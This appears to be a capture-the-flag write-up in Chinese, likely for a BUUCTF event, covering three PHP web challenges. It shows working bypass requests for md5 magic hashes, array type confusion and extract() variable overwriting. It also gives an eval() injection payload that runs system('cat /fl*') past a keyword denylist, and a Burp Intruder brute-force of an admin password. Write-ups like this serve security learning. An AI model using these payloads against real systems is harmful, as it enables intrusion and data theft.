img

flag

flag{32ae814a-7562-460c-a936-e6b88ed93f8f}

Begin of PHP

<?php
// Challenge source: five gates, each built on a PHP comparison or
// variable-handling pitfall.  The writeup's request below passes all of them.
error_reporting(0);
highlight_file(__FILE__);

if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    // Strict `!==` on the raw values but loose `==` on the two md5 hex digests:
    // different inputs whose digests compare equal under `==` get through.
    // `===` (or hash_equals()) on the digests is the safe comparison.
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        // md5() and sha1() of the same value compared strictly; the request
        // value is handed to both without checking that it is a string
        // (the writeup sends key3 as an array).
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        // Loose `== 0` on strcmp()'s result, again with no type check on key4
        // (the writeup passes it as an array).  Validate the type first.
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        // A value that is not numeric but still compares `> 2023` under PHP's
        // loose comparison rules; the writeup passes key5 as an array here too.
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

if($flag4){
    echo "=Level 5=<br>";
    // extract() turns every POST field into a local variable, so the request
    // can define $flag5 (and even replace $_POST, which the loop below reads).
    // Never call extract() on a request array.
    extract($_POST);
    foreach($_POST as $var){
        // The filter only inspects values of whatever $_POST is after extract().
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}

get传参http://7cef97a6-de7f-45e3-be80-6aff9cecbbab.node4.buuoj.cn:81/?key1=QNKCDZO&key2=240610708&key4[]=%22%22&key5[]=1
hackbar传参key3[]=&_POST=1&flag5=1
img

R!C!E!

<?php
highlight_file(__FILE__);
// Both POST fields must be present.  The second is named 'e_v.a.l': PHP
// rewrites '.' in incoming parameter names to '_', which is why the writeup
// below sends the name in a different form to reach it.
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
    $password=md5($_POST['password']);
    $code=$_POST['e_v.a.l'];
    // Only the first 6 hex digits of the digest are checked, so a short search
    // over plain numbers (114514 in the writeup) finds a matching password.
    if(substr($password,0,6)==="c4d038"){
        // A five-word case-insensitive denylist is the only filter in front of
        // eval(); any request body not literally containing these tokens is
        // executed as PHP.  A denylist cannot make eval() on input safe.
        if(!preg_match("/flag|system|pass|cat|ls/i",$code)){
            eval($code);
        }
    }
}

爆破得到MD5(114514)='c4d038b4bed09fdb1471ef51ec3a32cd'
满足前6位是c4d038
hackbar传参
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
img
获取flag
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
img

EasyLogin

密码应该是个md5
img
随便注册个用户看看
img
登录成功后看看源代码可以肯定是md5
img
是个弱口令
img
尝试爆破admin
img
发送到intruder
payload位置选择pwd
img
payload设置一下,尝试用1400w_rockyou字典爆破, processing设置成md5
img
有个8360的不一样,应该就是爆破成功的,把pw复制一下
img
回到登录界面,登录admin,pw随便写,拦截到请求包后把pw修改成复制的pw
记得在proxy setting里面把抓返回包的也开一下
img
img
修改完pw后一直点放行,抓到含flag的response包
img